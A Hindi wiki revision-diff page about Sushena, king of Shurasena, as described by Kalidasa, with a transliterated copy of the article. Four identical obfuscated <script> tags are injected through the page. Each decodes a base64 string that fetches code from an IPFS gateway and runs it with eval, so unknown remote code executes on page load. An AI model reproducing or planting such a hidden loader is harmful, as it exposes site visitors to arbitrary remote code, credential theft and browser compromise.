Difference between revisions of "सुषेण (शूरसेन नरेश)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{बहुविकल्पी|सुषेण}}
+
{{बहुविकल्प|बहुविकल्पी शब्द=सुषेण|लेख का नाम=सुषेण (बहुविकल्पी)}}  
 +
 
 
*[[कालिदास]] ने शूरसेन राज्य के अधिपति सुषेण का वर्णन किया है <ref>रघुवंश,सर्ग 6,45-51</ref>।  
 
*[[कालिदास]] ने शूरसेन राज्य के अधिपति सुषेण का वर्णन किया है <ref>रघुवंश,सर्ग 6,45-51</ref>।  
 
*[[मगध]], अंसु, [[अवंती]], अनूप, [[कलिंग]] और [[अयोध्या]] के बड़े राजाओं के बीच शूरसेन-नरेश की गणना की गई है।  
 
*[[मगध]], अंसु, [[अवंती]], अनूप, [[कलिंग]] और [[अयोध्या]] के बड़े राजाओं के बीच शूरसेन-नरेश की गणना की गई है।  
 
*कालिदास ने जिन विशेषणों का प्रयोग सुषेण के लिए किया है उन्हें देखने से ज्ञात होता है कि वह एक प्रतापी शासक था, जिसकी कीर्ति स्वर्ग के [[देवता]] भी गाते थे और जिसने अपने शुद्ध आचरण से माता-पिता दोनों के वंशों को प्रकाशित कर दिया था। <ref>सा शूरसेनाधिपतिं सुषेणमुद्दिश्य लोकन्तरगीतकीर्तिम्।</ref>  
 
*कालिदास ने जिन विशेषणों का प्रयोग सुषेण के लिए किया है उन्हें देखने से ज्ञात होता है कि वह एक प्रतापी शासक था, जिसकी कीर्ति स्वर्ग के [[देवता]] भी गाते थे और जिसने अपने शुद्ध आचरण से माता-पिता दोनों के वंशों को प्रकाशित कर दिया था। <ref>सा शूरसेनाधिपतिं सुषेणमुद्दिश्य लोकन्तरगीतकीर्तिम्।</ref>  
*सुषेण को विधिवत [[यज्ञ]] करने वाला, शांत प्रकृति का शासक बताया गया है, जिसके [[तेज़]] से शत्रु लोग घबराते थे।  
+
*सुषेण को विधिवत [[यज्ञ]] करने वाला, शांत प्रकृति का शासक बताया गया है, जिसके तेज़ से शत्रु लोग घबराते थे।  
*यहाँ [[मथुरा]] और [[यमुना नदी|यमुना]] की चर्चा करते हुए कालिदास ने लिखा है कि जब राजा सुषेण अपनी प्रेयसियों के साथ मथुरा में यमुना-विहार करते थे तब यमुना-जल का कृष्णवर्ण [[गंगा नदी|गंगा]]की उज्जवल लहरों-सा प्रतीत होता था <ref>यस्यावरोधस्तनचन्दनानां प्रक्षालनाद्वारि-विहारकाले</ref>।
+
*यहाँ [[मथुरा]] और [[यमुना नदी|यमुना]] की चर्चा करते हुए कालिदास ने लिखा है कि जब राजा सुषेण अपनी प्रेयसियों के साथ मथुरा में यमुना-विहार करते थे तब यमुना-जल का कृष्णवर्ण [[गंगा नदी|गंगा]]की उज्ज्वल लहरों-सा प्रतीत होता था <ref>यस्यावरोधस्तनचन्दनानां प्रक्षालनाद्वारि-विहारकाले</ref>।
  
 
{{प्रचार}}
 
{{प्रचार}}

Latest revision as of 06:11, 15 March 2016

chitr:Disamb2.jpg sushen ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- sushen (bahuvikalpi)
  • kalidas ne shoorasen rajy ke adhipati sushen ka varnan kiya hai [1].
  • magadh, aansu, avanti, anoop, kaliang aur ayodhya ke b de rajaoan ke bich shoorasen-naresh ki ganana ki gee hai.
  • kalidas ne jin visheshanoan ka prayog sushen ke lie kiya hai unhean dekhane se jnat hota hai ki vah ek pratapi shasak tha, jisaki kirti svarg ke devata bhi gate the aur jisane apane shuddh acharan se mata-pita donoan ke vanshoan ko prakashit kar diya tha. [2]
  • sushen ko vidhivat yajn karane vala, shaant prakriti ka shasak bataya gaya hai, jisake tez se shatru log ghabarate the.
  • yahaan mathura aur yamuna ki charcha karate hue kalidas ne likha hai ki jab raja sushen apani preyasiyoan ke sath mathura mean yamuna-vihar karate the tab yamuna-jal ka krishnavarn gangaki ujjval laharoan-sa pratit hota tha [3].


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


tika tippani aur sandarbh

  1. raghuvansh,sarg 6,45-51
  2. sa shoorasenadhipatian sushenamuddishy lokantaragitakirtimh.
  3. yasyavarodhastanachandananaan prakshalanadvari-viharakale

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>